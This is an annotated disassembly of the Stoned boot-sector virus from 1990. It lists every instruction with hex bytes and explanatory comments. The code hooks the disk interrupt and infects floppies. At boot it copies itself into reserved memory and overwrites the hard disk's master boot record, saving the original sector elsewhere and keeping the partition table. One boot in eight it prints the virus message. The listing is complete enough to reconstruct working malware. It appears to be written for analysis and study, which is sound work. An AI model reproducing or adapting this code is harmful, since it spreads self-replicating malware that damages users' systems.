;STONED PC COMPUTER VIRUS
;Disassembled by Chris Cantrell 1990
; Start
; This jump is checked by the ROM to verify that a valid boot sector is present.
0000: EA 05 00 C0 07 JMP $07C0:$0005 ; *1 07C0 is where the boot sector is
; loaded. Jump to next instruction.
; (Re-orient the CS along the way)
0005: E9 99 00 JMP $00A1 ; *2 Jump over data area
0008: 00 ; Media source. 0 if loaded from a floppy, 2 from a fixed disk.
; Offs Seg
0009: 00 00 00 00 ; Original INT 13 vector
000D: E4 00 00 00 ; Resident virus location in memory (used for easy JMP)
0011: 00 7C 00 00 ; Pointer to original boot sector memory (used for easy JMP)
; Infector
;-----------------------------------------------------------------
; Infector
;-----------------------------------------------------------------
; New INT 13 handler
0015: 1E PUSH DS ; Hold ...
0016: 50 PUSH AX ; ... incoming parameters
0017: 80 FC 02 CMP AH,$02 ; Is this a READ SECTOR request?
001A: 72 17 JB $0033 ; Ingore all requests ...
001C: 80 FC 04 CMP AH,$04 ; ... except ...
001F: 73 12 JNB $0033 ; ... READ = 2 or WRITE = 3 ...
0021: 0A D2 OR DL,DL ; ... to drive 0 ...
0023: 75 0E JNZ $0033 ; ... (floppy)
0025: 33 C0 XOR AX,AX ; Set the DS register ...
0027: 8E D8 MOV DS,AX ; ... to 0000
; The first sector in a group written to disk starts the drive motor. This check is a way
; for the virus to check the boot sector only on the first sector in a group and not
; on every sector which would bring the disk access to a crawl.
0029: A0 3F 04 MOV AL,[DS:$043F] ; Check to see if drive motor is ...
002C: A8 01 TEST AL,$01 ; ... already turned on.
002E: 75 03 JNZ $0033 ; Yes ... don't do anything
0030: E8 07 00 CALL $003A ; Do any viral infection
0033: 58 POP AX ; Restore original ...
0034: 1F POP DS ; ... incoming parameters
0035: 2E FF 2E 09 00 JMP FAR [CS:$0009] ; Execute the original INT 13
;
; Try to infect Drive A
;
003A: 53 PUSH BX ; Save all ...
003B: 51 PUSH CX ; ...
003C: 52 PUSH DX ; ...
003D: 06 PUSH ES ; ...
003E: 56 PUSH SI ; ...
003F: 57 PUSH DI ; ... registers
0040: BE 04 00 MOV SI,$0004 ; 4 attemps at reading (motor warm up)
0043: B8 01 02 MOV AX,$0201 ; Read one sector
0046: 0E PUSH CS ; Set ES to point ...
0047: 07 POP ES ; ... to code segment
0048: BB 00 02 MOV BX,$0200 ; Just past the virus in memory
004B: 33 C9 XOR CX,CX ; Cyl 0, Sect 1 (shortly)
004D: 89 CA MOV DX,CX ; Head 0, Drive 0
004F: 41 INC CX ; Now Cyl 1
0050: 9C PUSHF ; *4 Set stack as if an interrupt
0051: 2E FF 1E 09 00 CALL FAR [CS:$0009] ; Read boot sector with INT 13
0056: 73 0E JNB $0066 ; Got it ... move on.
0058: 33 C0 XOR AX,AX ; Reset drive command
005A: 9C PUSHF ; Set stack as if an interrupt
005B: 2E FF 1E 09 00 CALL FAR [CS:$0009] ; Reset drive with INT 13
0060: 4E DEC SI ; All attempts tried?
0061: 75 E0 JNZ $0043 ; No ... keep trying
0063: EB 35 JMP $009A ; Couldn't do it ... out
0065: 90 NOP ; Assembler fill
;
; At this point the drive is responding - load the boot sector into virus memory segment
; and check if it has been infected.
0066: 33 F6 XOR SI,SI ; Virus starting point
0068: BF 00 02 MOV DI,$0200 ; Just read boot sector
006B: FC CLD ; Moving forward
006C: 0E PUSH CS ; Set DS to ...
006D: 1F POP DS ; ... code segment
006E: AD LODSW ; First word of virus
006F: 3B 05 CMP AX,[DI] ; Looks the same as boot sector?
0071: 75 06 JNZ $0079 ; No ... we need to infect
0073: AD LODSW ; Compare second words to be sure
0074: 3B 45 02 CMP AX,[DI+$02] ; Looks the same?
0077: 74 21 JZ $009A ; Yes ... already infected
;
; Boot sector is not infected - move original into FAT table and write virus to boot sector.
0079: B8 01 03 MOV AX,$0301 ; Write one sector
007C: BB 00 02 MOV BX,$0200 ; Point to original boot
007F: B1 03 MOV CL,$03 ; *5 Cyl 0, Sec 3
0081: B6 01 MOV DH,$01 ; Head 1, Drive 0
0083: 9C PUSHF ; Set stack as if an interrupt
0084: 2E FF 1E 09 00 CALL [CS:$0009] ; Hold original boot sector
0089: 72 0F JB $009A ; Error ... out of here
008B: B8 01 03 MOV AX,$0301 ; Write one sector
008E: 33 DB XOR BX,BX ; At offset 0
0090: B1 01 MOV CL,$01 ; Sector 1
0092: 33 D2 XOR DX,DX ; Drive head 0
0094: 9C PUSHF ; As if an interrupt
0095: 2E FF 1E 09 00 CALL FAR [CS:$0009] ; Write virus to normal boot entry
;
; Restore original parameters to INT 13 request and do original INT 13.
009A: 5F POP DI ; Restore all ...
009B: 5E POP SI ; ...
009C: 07 POP ES ; ...
009D: 5A POP DX ; ...
009E: 59 POP CX ; ...
009F: 5B POP BX ; ... Registers
00A0: C3 RET ; Done
;-----------------------------------------------------------------
; Loader
;-----------------------------------------------------------------
; Loader
;-----------------------------------------------------------------
; Executes on bootup
00A1: 33 C0 XOR AX,AX ; Set DS to ...
00A3: 8E D8 MOV DS,AX ; ... system segment
00A5: FA CLI ; No interrupts through here
00A6: 8E D0 MOV SS,AX ; Set a temporary ...
00A8: BC 00 7C MOV SP,$7C00 ; ... stack
00AB: FB STI ; Interrupts can happen now
00AC: A1 4C 00 MOV AX,[DS:$004C] ; Save ...
00AF: A3 09 7C MOV [DS:$7C09],AX ; ... original ...
00B2: A1 4E 00 MOV AX,[DS:$004E] ; ... INT 13 ...
00B5: A3 0B 7C MOV [DS:$7C0B],AX ; ... vector.
00B8: A1 13 04 MOV AX,[DS:$0413] ; *6 Number of K bytes in free memory
00BB: 48 DEC AX ; Reserve ...
00BC: 48 DEC AX ; ... 2K for virus (and buffer)
00BD: A3 13 04 MOV [DS:$0413],AX ; New number of available K bytes
00C0: B1 06 MOV CL,$06 ; Convert K byte number ...
00C2: D3 E0 SHL AX,CL ; ... to segment address
00C4: 8E C0 MOV ES,AX ; MOVSB destination: virus segment
00C6: A3 0F 7C MOV [DS:$7C0F],AX ; Store virus segment in our area
00C9: B8 15 00 MOV AX,$0015 ; Offset to new INT13 handle
00CC: A3 4C 00 MOV [DS:$004C],AX ; New INT13 offset ...
00CF: 8C 06 4E 00 MOV [DS:$004E],ES ; ... and segment
00D3: B9 B8 01 MOV CX,$01B8 ; Bytes in virus
00D6: 0E PUSH CS ; DS points to ...
00D7: 1F POP DS ; ... segment with virus code
00D8: 33 F6 XOR SI,SI ; Offsets are both ...
00DA: 8B FE MOV DI,SI ; ... zero
00DC: FC CLD ; Moving forward
00DD: F3 A4 REPZ MOVSB ; Move virus into top of memroy
00DF: 2E FF 2E 0D 00 JMP FAR [CS:$000D] ; Continue with next instruction in
; new segment.
;
; At this point virus is running in its new 2K home at the end of RAM.
00E4: B8 00 00 MOV AX,$0000 ; Reset disk system (prepare for IO)
00E7: CD 13 INT $13 ; Disk now ready
00E9: 33 C0 XOR AX,AX ; Set ES to ...
00EB: 8E C0 MOV ES,AX ; ... system segment
00ED: B8 01 02 MOV AX,$0201 ; Read 1 sector
00F0: BB 00 7C MOV BX,$7C00 ; Read location = normal boot buffer
00F3: 2E803E0800 00 CMP BYTE PTR [CS:$0008],$00 ; *7 Are we booting from a hard-disk?
00F9: 74 0B JZ $0106 ; No ... use floppy hold sector
00FB: B9 07 00 MOV CX,$0007 ; Cyl 0, Sec 7
00FE: BA 80 00 MOV DX,$0080 ; Head 0, Drive 80
0101: CD 13 INT $13 ; Read original boot from storage
0103: EB 49 JMP $014E ; Continue with normal boot
0105: 90 NOP ; Assembler fill
;
; We are booting up from a floppy - have a look at any local fixed-disks.
0106: B9 03 00 MOV CX,$0003 ; Cyl 0, Sec 3
0109: BA 00 01 MOV DX,$0100 ; Head 1, Drive 0
010C: CD 13 INT $13 ; Load the original boot sector
010E: 72 3E JB $014E ; Error -- nothing we can do!
0110: 26F6066C0407 TEST BYTE PTR [ES:$046C],$07 ; *8 Low byte of timer (random)
0116: 75 12 JNZ $012A ; Skip over 7/8 of the time
;
; 1 out of every 8 infected hard drives will see this message at the boot up where
; they are infected.
0118: BE 89 01 MOV SI,$0189 ; Message
011B: 0E PUSH CS ; Set DS ...
011C: 1F POP DS ; ... to virus segment
011D: AC LODSB ; Get byte in message
011E: 0A C0 OR AL,AL ; Last loaded?
0120: 74 08 JZ $012A ; Yes ... done with message
0122: B4 0E MOV AH,$0E ; Teletype mode
0124: B7 00 MOV BH,$00 ; Base of screen
0126: CD 10 INT $10 ; Print character
0128: EB F3 JMP $011D ; Do all characters
;
012A: 0E PUSH CS ; Set ES ...
012B: 07 POP ES ; ... to CS
012C: B8 01 02 MOV AX,$0201 ; Read current boot from C:
012F: BB 00 02 MOV BX,$0200 ; Buffer after virus
0132: B1 01 MOV CL,$01 ; Cyl = 0 (still), Sec = 1
0134: BA 80 00 MOV DX,$0080 ; Head = 0, Drive = 80
0137: CD 13 INT $13 ; Read current boot sector
0139: 72 13 JB $014E ; Error ... skip it
013B: 0E PUSH CS ; Set DS ...
013C: 1F POP DS ; ... to CS
013D: BE 00 02 MOV SI,$0200 ; Current boot sector data
0140: BF 00 00 MOV DI,$0000 ; Virus data
0143: AD LODSW ; Get first word of boot sector
0144: 3B 05 CMP AX,[DI] ; Same as virus?
0146: 75 11 JNZ $0159 ; No ... infect it
0148: AD LODSW ; Yes ... try second word
0149: 3B 45 02 CMP AX,[DI+$02] ; Boot sector looks like virus?
014C: 75 0B JNZ $0159 ; No ... infect it
;
; No matter how virus loaded, it infects only floppy disks that get a copy of the
; memory-resident copy of the virus. We want floppies to have media type = 0.
014E: 2E C6 06 08 00 00 MOV BYTE PTR [CS:$0008],$00 ; Media type = floppy.
0154: 2E FF 2E 11 00 JMP [CS:$0011] ; Continue with normal boot sector
;
; Infect hard-drive
0159: 2E C6 06 08 00 02 MOV BYTE PTR [CS:$0008],$02 ; Store virus on C: with flag set
015F: B8 01 03 MOV AX,$0301 ; Write 1 sector
0162: BB 00 02 MOV BX,$0200 ; Original boot sector
0165: B9 07 00 MOV CX,$0007 ; Cyl = 0, Sec = 7
0168: BA 80 00 MOV DX,$0080 ; Head = 0, Drive = 80
016B: CD 13 INT $13 ; Store original boot in FAT
016D: 72 DF JB $014E ; Error ... out of here
;
; Floppies are assumed to have 512 byte sectors (0200 hex) which is just barely
; room for the virus. Fixed disks are assumed to have twice that - 1K sectors (0400).
; The last 512 bytes of a fixed-disk boot record contain four partition descriptors.
; These descriptors describe the partitions and must be present in the infected
; sector - this code copies the descriptors into the virus sector buffer before writing
; it to disk.
016F: 0E PUSH CS ; Set DS ...
0170: 1F POP DS ; ... to CS
0171: 0E PUSH CS ; Set ES ...
0172: 07 POP ES ; ... to CS
0173: BE BE 03 MOV SI,$03BE ; Copy partition ...
0176: BF BE 01 MOV DI,$01BE ; ... descriptors ...
0179: B9 42 02 MOV CX,$0242 ; ... into ...
017C: F3 A4 REPZ MOVSB ; ... virus sector buffer.
017E: B8 01 03 MOV AX,$0301 ; Write one sector
0181: 33 DB XOR BX,BX ; Offset 0
0183: FE C1 INC CL ; Cyl = 0, Sec = 1
0185: CD 13 INT $13 ; Write infected boot sector
0187: EB C5 JMP $014E ; Continue with normal boot sector
; StonedMessage
; $07,'Your PC is now STONED!',$07,$0d,$0a,$0a,$00
0189: 07 59 6F 75
018D: 72 20 50
0190: 43 20 69
0193: 73 20 6E
0196: 6F
0197: 77 20 53
019A: 54 4F 4E
019D: 45
019E: 44 21 07
01A1: 0D 0A 0A 00
; This is part of the virus but is never printed on the screen (notice no CR/LF on the end)
; 'LEGALISE MARIJUANA!'
01A5: 4C 45 47 41
01A9: 4C 49 53
01AC: 45 20 4D 41
01B0: 52 49 4A
01B3: 55 41 4E 41 21